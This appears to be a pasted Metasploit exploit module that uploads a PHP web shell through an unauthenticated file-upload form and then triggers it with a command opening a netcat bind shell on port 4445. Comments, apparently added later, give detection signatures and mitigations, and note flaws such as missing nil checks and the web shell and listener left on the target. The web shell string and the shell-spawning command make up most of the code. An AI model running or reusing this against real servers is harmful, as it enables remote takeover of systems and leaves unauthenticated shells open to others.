
super cool msf module

a guest Dec 30th, 2014 212 Never
  1.  
  2. ##
  3. # This module requires Metasploit: http://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
  # Metasploit remote module, as pasted, that targets a PHP file-upload handler.
  #
  # What the visible code does:
  #   * check   - one GET to <base>/upload/upload.php.
  #   * exploit - one multipart POST to <base>/upload/upload.php carrying a small
  #               PHP file in the form field "plik", then one GET to
  #               <base>/upload/foto/<10 random letters>.php with a "c" parameter.
  #
  # No product, version or advisory is named; the only reference is a blog URL.
  #
  # Defender notes (what this traffic looks like, and what stops it):
  #   * Web logs: a POST to .../upload/upload.php followed by a GET for a
  #     ten-letter *.php name under .../upload/foto/ with a "c" query parameter.
  #   * Host: a new .php file in the upload directory whose content is the fixed
  #     string in #exploit (easy to signature), and a TCP listener on port 4445.
  #   * The flow only works if the handler stores a client-named .php file in a
  #     web-served directory where PHP is executed (inferred from the request
  #     sequence; the target's code is not shown). Allow-listing upload types,
  #     generating server-side file names, storing uploads outside the web root
  #     or disabling script execution there, and requiring authentication on the
  #     upload endpoint each break that chain.
  #
  # NOTE(review): Msf::HTTP::Wordpress is mixed in although no WordPress-specific
  # helper is called here; it presumably supplies the HTTP helpers used below
  # (normalize_uri, send_request_cgi) - confirm.
  # NOTE(review): Msf::Exploit::FileDropper is mixed in, but no cleanup
  # registration appears in this class, so the uploaded file is not registered
  # for removal and stays on the tested host.
  # NOTE(review): the framework-selected payload is never referenced; the command
  # sent in #exploit is hard-coded.
  class Metasploit3 < Msf::Exploit::Remote
    # Rank claimed by the author; nothing in this listing substantiates it.
    Rank = ExcellentRanking

    include Msf::HTTP::Wordpress
    include Msf::Exploit::FileDropper

    # Registers the module metadata with the framework.
    #
    # @param info [Hash] metadata handed in by the framework, merged via update_info
    def initialize(info = {})
      # Whitespace inside %q{...} is part of the string, so the two lines of the
      # description keep the exact columns they had in the original listing.
      module_info = {
        'Name'           => 'Super cool shell upload',
        'Description'    => %q{
                This is super cool module for Metasploit to check if you can upload shell on target.
      },
        'Author'         => [
          'HauntIT Blog' # metasploit module
        ],
        'License'        => MSF_LICENSE,
        'References'     => [
          ['URL', 'http://HauntIT.blogspot.com']
        ],
        'Privileged'     => false,
        'Platform'       => ['php'],
        'Arch'           => ARCH_PHP,
        'Targets'        => [['Any vulnerable upload ', {}]],
        'DefaultTarget'  => 0,
        # NOTE(review): written day/month/year; other framework modules spell the
        # date out (e.g. 'Dec 28 2014') - confirm this value is parsed as intended.
        'DisclosureDate' => '28/12/2014'
      }

      super(update_info(info, module_info))
    end

    # Probes for the upload endpoint with a single GET.
    #
    # Returns CheckCode::Unknown when the status is not 200 and CheckCode::Safe
    # when it is. No branch returns a "vulnerable"-type code, so the result says
    # nothing about whether the handler accepts PHP files; a "Safe" answer here
    # must not be read as evidence that a host is not exposed.
    #
    # NOTE(review): `res` is used without a nil check; if send_request_cgi
    # returns nil (no response), `res.code` raises NoMethodError.
    def check
      probe_uri = normalize_uri(target_uri.path, 'upload', 'upload.php')
      probe = {
        'uri'    => probe_uri,
        'method' => 'GET'
      }
      res = send_request_cgi(probe)

      return Msf::Exploit::CheckCode::Unknown unless res.code == 200

      Msf::Exploit::CheckCode::Safe
    end

    # Uploads a fixed PHP file through the form field "plik", then requests it.
    #
    # Observable sequence: POST <base>/upload/upload.php (multipart), then
    # GET <base>/upload/foto/<payload_name>?c=... . The upload is treated as
    # failed when the status is not 200 or the body matches /Blad/.
    #
    # NOTE(review): neither response is nil-checked before `res.code`.
    def exploit
      payload_name = "#{rand_text_alpha(10)}.php"

      # Fixed file content: identical on every run, so it can be matched by
      # content on disk or in an upload-inspection rule.
      shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"

      upload_uri = normalize_uri(target_uri.path, 'upload', 'upload.php')

      form = Rex::MIME::Message.new
      form.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")

      body = form.to_s

      dropped_uri = normalize_uri(target_uri.path, 'upload', 'foto', payload_name)

      print_status("#{peer} - Uploading payload to #{dropped_uri}")
      upload = {
        'method'    => 'POST',
        'uri'       => upload_uri,
        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
        # Single-quoted: the literal text #{payload_name} is what is passed, not
        # the generated file name. How the framework combines 'vars_post' with an
        # explicit 'data' body is not visible here.
        'vars_post' => { 'plik' => '#{payload_name}' },
        'data'      => body
      }
      res = send_request_cgi(upload)

      # /Blad/ is presumably the handler's error text - confirm against the target.
      accepted = res.code == 200 && res.body !~ /Blad/
      if accepted
        print_status("Got shell ;>")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
      end

      print_status("#{peer} - Executing payload #{dropped_uri}")
      # NOTE(review): the command is hard-coded and leaves a background listener
      # on TCP 4445 with no authentication visible in it; on a tested host that
      # listener and the uploaded file both persist until removed by hand.
      trigger = {
        'uri'      => dropped_uri,
        'method'   => 'GET',
        'vars_get' => { 'c' => 'id;nc -lvvp 4445 -e /bin/sh &' }
      }
      send_request_cgi(trigger)
    end
  end